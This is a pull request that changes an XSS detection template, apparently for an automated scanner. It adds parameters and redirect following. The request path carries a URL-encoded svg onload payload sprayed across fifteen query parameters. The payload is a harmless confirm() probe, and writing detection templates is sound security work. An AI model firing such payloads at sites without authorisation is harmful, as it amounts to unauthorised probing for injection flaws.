### PR TITLE
Update top-15-xss.yaml

### DIFF
--- a/generic-detections/top-15-xss.yaml
+++ b/generic-detections/top-15-xss.yaml
@@ -5,8 +5,8 @@ info:
   # Name is the name of the template
   name: Top 15 XSS Check
   # Author is the name of the author for the template
-  # Prams:- q, s, search, id, action, keyword, query, page, keywords, url, view, cat, p
-  author: foulenzer
+  # Prams:- q, s, search, id, action, keyword, query, page, keywords, url, view, cat, name, key, p
+  author: foulenzer & geeknik
   # Severity is the severity for the template.
   severity: medium
   #  Description optionally describes the template.
@@ -16,6 +16,8 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27testing-xss%27%29%3E"
+    redirects: true
+    max-redirects: 1
     matchers-condition: and
     matchers:
       - type: word


### PR DESCRIPTION
Fine tuning the template. Sometimes a host will redirect the original request to another page or subdomain and the XSS happens on that page instead of with the original request. I believe a max-redirects of 1 should be sufficient.